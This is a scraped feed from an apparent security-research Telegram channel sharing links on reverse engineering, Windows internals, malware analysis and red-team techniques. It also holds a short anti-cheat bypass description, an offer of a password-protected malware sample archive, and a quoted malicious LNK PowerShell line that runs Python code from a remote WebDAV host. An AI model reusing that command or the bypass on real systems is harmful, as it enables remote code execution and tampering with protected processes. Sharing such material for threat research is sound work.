Custom instruction length for hex-rays
https://github.com/milankovo/instrlen.git
The Instrlen plugin is a tool for IDA Pro that allows for setting the length of an instruction to a custom value. This can be useful when the code is obfuscated or there are jumps after the instruction prefixes.
https://github.com/milankovo/instrlen.git
😁4👍1
CPP / C++ Notes - Windows API Programming Win32
https://caiorss.github.io/C-Cpp-Notes/WindowsAPI-cpp.html#orge9d5c6d
https://caiorss.github.io/C-Cpp-Notes/WindowsAPI-cpp.html#orge9d5c6d
🔥8👍1
Forwarded from K4YT3X's Channel (K4YT3X)
之前一个很简单绕过内核反作弊的方法我开源了:
https://github.com/k4yt3x/InstantSuspend
基本上就是在进程被驱动保护之前你 suspend 它就可以给你个机会 OpenProcess 拿到 handle 或者改代码之类的,有些反作弊解冻进程之后后续还是不能读写内存,有些只要拿到了 handle 后面就能继续用
实在是很简单,也没必要藏着掖着
https://github.com/k4yt3x/InstantSuspend
基本上就是在进程被驱动保护之前你 suspend 它就可以给你个机会 OpenProcess 拿到 handle 或者改代码之类的,有些反作弊解冻进程之后后续还是不能读写内存,有些只要拿到了 handle 后面就能继续用
实在是很简单,也没必要藏着掖着
👍1🔥1😁1🤔1
PhishiUrl
https://github.com/EmadYaY/PhishiUrl
A tool for generating and detecting Unicode domains to identify phishing URLs, aimed at assisting cybersecurity professionals in recognizing and mitigating homograph attacks.
https://github.com/EmadYaY/PhishiUrl
🔥7👍2❤1😁1🙏1
Catalog of key Windows kernel data structures
https://codemachine.com/articles/kernel_structures.html
Understanding EProcess Structure
https://info-savvy.com/understanding-eprocess-structure/
Thanks to https://x.com/5mukx
https://codemachine.com/articles/kernel_structures.html
Understanding EProcess Structure
https://info-savvy.com/understanding-eprocess-structure/
Thanks to https://x.com/5mukx
❤4👾1
Just an attempt to group extracted data from Defender for research purposes.
https://github.com/HackingLZ/ExtractedDefender
credits : Justin Elze
https://github.com/HackingLZ/ExtractedDefender
credits : Justin Elze
👍2
Local Admin In Less Than 60 Seconds (Part 1)
https://medium.com/@nickvourd/local-admin-in-less-than-60-seconds-part-1-e2a0c0102b99
https://medium.com/@nickvourd/local-admin-in-less-than-60-seconds-part-1-e2a0c0102b99
❤3
Snowy Days & The Malware Packing Ways
https://deluks2006.github.io/posts/snowy-days-and-the-malware-packing-ways/
#packers
https://deluks2006.github.io/posts/snowy-days-and-the-malware-packing-ways/
#packers
Source Byte
I gathered samples related to Attack Against Iran’s State Broadcaster if you have access to those three missing files plz share it in group file pass : infected credits : vx-underground MalwareBazaar checkpoint
Iran’s State Broadcaster.zip
4.2 MB
Thanks " a gh " for sharing missing files ( two windows event logs )
password is
password is
infected❤12🔥2👍1
Forwarded from Infosec Fortress
SSHishing – Abusing Shortcut Files and the Windows SSH Client for Initial Access
🔗 Link
#redteam
#initial_access
———
🆔 @Infosec_Fortress
🔗 Link
#redteam
#initial_access
———
🆔 @Infosec_Fortress
👍4❤3🔥3
Infosec Fortress
SSHishing – Abusing Shortcut Files and the Windows SSH Client for Initial Access 🔗 Link #redteam #initial_access ——— 🆔 @Infosec_Fortress
https://cyble.com/blog/ursnif-trojan-hides-with-stealthy-tactics/
lnk are so strange you can literally do anything with them and yet no security log to detect them :(
lnk are so strange you can literally do anything with them and yet no security log to detect them :(
👍5
or even run python remotely
-w hid -nop -c "[system.Diagnostics.Process]::Start('msedge','http://194.126.178.8/webdav/wody.pdf'); \\194.126.178.8@80\webdav\Python39\python.exe \\194.126.178.8@80\webdav\Python39\Client.py"👍5
Source Byte
or even run python remotely -w hid -nop -c "[system.Diagnostics.Process]::Start('msedge','http://194.126.178.8/webdav/wody.pdf'); \\194.126.178.8@80\webdav\Python39\python.exe \\194.126.178.8@80\webdav\Python39\Client.py"
19d0c55ac466e4188c4370e204808ca0bc02bba480ec641da8190cb8aee92bdc.lnk
2.9 KB
🔥5👍2
Forwarded from Alee
There is a job opportunity in the field of cybersecurity. If you are interested in working in this field, please send your resume via linkedin [ HERE ] or via telegram [ @AleeAmini ] .
[ + ] Familiarity with reverse engineering and malware analysis.
[ + ] Familiarity with one of the programming languages Python, C/Cpp.
[ + ] Familiarity with Linux operating system
[ + ] Familiarity with security concepts.
[ + ] Familiarity with Python, PowerShell and Bash noscripting.
[ + ] Familiarity with cyber attacks
Skills that are considered as advantages:
[ + ] Familiarity with Threat Intelligence
[ + ] Familiarity with CTI concepts
[ + ] Mastery of reverse engineering and binary analysis
[ + ] Familiarity with Windows/Linux internals
[ + ] Familiarity with reverse engineering and malware analysis.
[ + ] Familiarity with one of the programming languages Python, C/Cpp.
[ + ] Familiarity with Linux operating system
[ + ] Familiarity with security concepts.
[ + ] Familiarity with Python, PowerShell and Bash noscripting.
[ + ] Familiarity with cyber attacks
Skills that are considered as advantages:
[ + ] Familiarity with Threat Intelligence
[ + ] Familiarity with CTI concepts
[ + ] Mastery of reverse engineering and binary analysis
[ + ] Familiarity with Windows/Linux internals
🔥13👾7❤1⚡1👍1
Source Byte
There is a job opportunity in the field of cybersecurity. If you are interested in working in this field, please send your resume via linkedin [ HERE ] or via telegram [ @AleeAmini ] . [ + ] Familiarity with reverse engineering and malware analysis. [ + ]…
Hi
one-thing i forgot to mention :/
these opportunity jobs are CTI & TR at the time and it only available in Tehran
have a nice day 😬
one-thing i forgot to mention :/
these opportunity jobs are CTI & TR at the time and it only available in Tehran
have a nice day 😬
😁5👍1💋1👾1
Hijack the TypeLib. New COM persistence technique
https://cicada-8.medium.com/hijack-the-typelib-new-com-persistence-technique-32ae1d284661
https://cicada-8.medium.com/hijack-the-typelib-new-com-persistence-technique-32ae1d284661
❤2🔥2
Agent Tesla Analysis [Part 1: Unpacking]
Deobfuscation of Lumma Stealer
https://ryan-weil.github.io/posts/AGENT-TESLA-1/
Deobfuscation of Lumma Stealer
https://ryan-weil.github.io/posts/LUMMA-STEALER/
❤2🔥2👾1